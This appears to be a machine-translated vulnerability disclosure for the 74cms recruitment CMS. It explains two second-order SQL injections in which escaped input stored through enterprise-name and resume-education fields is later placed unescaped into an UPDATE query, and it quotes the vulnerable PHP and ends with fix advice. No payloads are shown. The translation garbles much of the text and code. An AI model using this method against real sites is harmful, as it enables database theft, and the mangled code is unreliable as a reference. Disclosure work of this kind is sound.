74cms (20140709) Secondary Injection

74cms (20140709) Secondary Injection

Instead of modifying the code that causes the vulnerability, you can modify the filter function.
The current filter function, although I cannot bypass it.
However, we can still find several data records.
Not passed before. This time, two packages are made.

P.S .....
You should not only modify the filter function, but also fix the vulnerability code properly.

First. The first one will not analyze the code.

First register an enterprise member and then create an Enterprise
 

Single quotes are escaped and then escaped into the database.

Find the warehouse picking place.



After creating the Enterprise, publish the recruitment as follows.
 

 

Click Publish to view the error message. The enterprise name just now has been released and brought into the query.



Data can still be output under a slightly constructed structure. This is not much to say about the data. The second part is to talk about the data.



_____________________________________________________________________________





Second

Different from the previous one, this is a registered individual member.

Then release your resume.



Look at the code



In user/personal/personal_resume.php


 

Elseif ($ act = 'make4 _ save') {$ resume_education = get_resume_education ($ _ SESSION ['uid'], $ _ REQUEST ['pid ']); if (count ($ resume_education)> = 6) showmsg ('educational experience cannot exceed 6! ', 1, $ link); $ setsqlarr ['uid'] = intval ($ _ SESSION ['uid']); $ setsqlarr ['pid '] = intval ($ _ REQUEST ['pid']); if ($ setsqlarr ['uid'] = 0 | $ setsqlarr ['pid'] = 0) showmsg ('parameter error! ', 1); $ setsqlarr ['start'] = trim ($ _ POST ['start'])? $ _ POST ['start']: showmsg ('Enter the start time! ', 1, $ link); $ setsqlarr ['endtime'] = trim ($ _ POST ['endtime'])? $ _ POST ['endtime']: showmsg ('enter the end time! ', 1, $ link); $ setsqlarr ['school'] = trim ($ _ POST ['school '])? $ _ POST ['school ']: showmsg (' enter the school name! ', 1, $ link); $ setsqlarr ['speciality'] = trim ($ _ POST ['speciality '])? $ _ POST ['speciality ']: showmsg (' enter a professional name! ', 1, $ link); $ setsqlarr ['ucation'] = trim ($ _ POST ['ucation'])? $ _ POST ['education']: showmsg ('select a degree! ', 1, $ link); $ setsqlarr ['education _ cn'] = trim ($ _ POST ['education _ cn'])? $ _ POST ['education _ cn']: showmsg ('select a degree! ', 1, $ link); if (inserttable (table ('resume _ education'), $ setsqlarr) {check_resume ($ _ SESSION ['uid'], intval ($ _ REQUEST ['pid ']);

Inserttable (table ('resume _ education ')

Here, the post data is imported into the insert database.

Here we submit a single quotation mark and insert it, although it is an escape character.

However, the escape characters are eliminated after the data is imported into the database.

Then proceed to the check_resume


 

function check_resume($uid,$pid){global $db,$timestamp,$_CFG;$uid=intval($uid);$pid=intval($pid);$percent=0;$resume_basic=get_resume_basic($uid,$pid);$resume_intention=$resume_basic['intention_jobs'];$resume_specialty=$resume_basic['specialty'];$resume_education=get_resume_education($uid,$pid);if (!empty($resume_basic))$percent=$percent+15;if (!empty($resume_intention))$percent=$percent+15;if (!empty($resume_specialty))$percent=$percent+15;if (!empty($resume_education))$percent=$percent+15;if ($resume_basic['photo_img'] && $resume_basic['photo_audit']=="1"  && $resume_basic['photo_display']=="1"){$setsqlarr['photo']=1;}else{$setsqlarr['photo']=0;}if ($percent<60){$setsqlarr['complete_percent']=$percent;$setsqlarr['complete']=2;}else{$resume_work=get_resume_work($uid,$pid);$resume_training=get_resume_training($uid,$pid);$resume_photo=$resume_basic['photo_img'];if (!empty($resume_work))$percent=$percent+13;if (!empty($resume_training))$percent=$percent+13;if (!empty($resume_photo))$percent=$percent+14;$setsqlarr['complete']=1;$setsqlarr['complete_percent']=$percent;require_once(QISHI_ROOT_PATH.'include/splitword.class.php');$sp = new SPWord();$setsqlarr['key']=$resume_basic['intention_jobs'].$resume_basic['recentjobs'].$resume_basic['specialty'];$setsqlarr['key']="{$resume_basic['fullname']} ".$sp->extracttag($setsqlarr['key']);$setsqlarr['key']=str_replace(","," ",$resume_basic['intention_jobs'])." {$setsqlarr['key']} {$resume_basic['education_cn']}";$setsqlarr['key']=$sp->pad($setsqlarr['key']);if (!empty($resume_education)){foreach($resume_education as $li){$setsqlarr['key']="{$li['school']} {$setsqlarr['key']} {$li['speciality']}";}}$setsqlarr['refreshtime']=$timestamp;}updatetable(table('resume'),$setsqlarr,"uid='{$uid}' AND id='{$pid}'");updatetable(table('resume_tmp'),$setsqlarr,"uid='{$uid}' AND id='{$pid}'");

$ Resume_education = get_resume_education ($ uid, $ pid );



Here, I checked the database in the warehouse just now, so it came out in single quotes. Continue.


 

$setsqlarr['key']=$resume_basic['intention_jobs'].$resume_basic['recentjobs'].$resume_basic['specialty'];$setsqlarr['key']="{$resume_basic['fullname']} ".$sp->extracttag($setsqlarr['key']);$setsqlarr['key']=str_replace(","," ",$resume_basic['intention_jobs'])." {$setsqlarr['key']} {$resume_basic['education_cn']}";$setsqlarr['key']=$sp->pad($setsqlarr['key']);if (!empty($resume_education)){foreach($resume_education as $li){$setsqlarr['key']="{$li['school']} {$setsqlarr['key']} {$li['speciality']}";}}$setsqlarr['refreshtime']=$timestamp;}updatetable(table('resume'),$setsqlarr,"uid='{$uid}' AND id='{$pid}'");updatetable(table('resume_tmp'),$setsqlarr,"uid='{$uid}' AND id='{$pid}'");

Then, the database is delivered to an array and then brought to update.



Cause injection. The update can control the point at the set position.

So we can update what is in this table.


 

 

An error is reported.



Here we convert address updata into the data to be output.


 

 

Data is successfully filtered out for keywords.





The demo is successfully tested.


 

Http://demo.74cms.com/resume/resume-show-6271.htm


 

You should modify the code rather than simply modifying the filter function.



This type of secondary injection only calls stripcslashes once



74cms implements global escape. If it is escaped again, it will contain an escape character even if it is stored in the database. Naturally, the warehouse is also available.



Alternatively, you can perform the addslashes operation once after the database is released.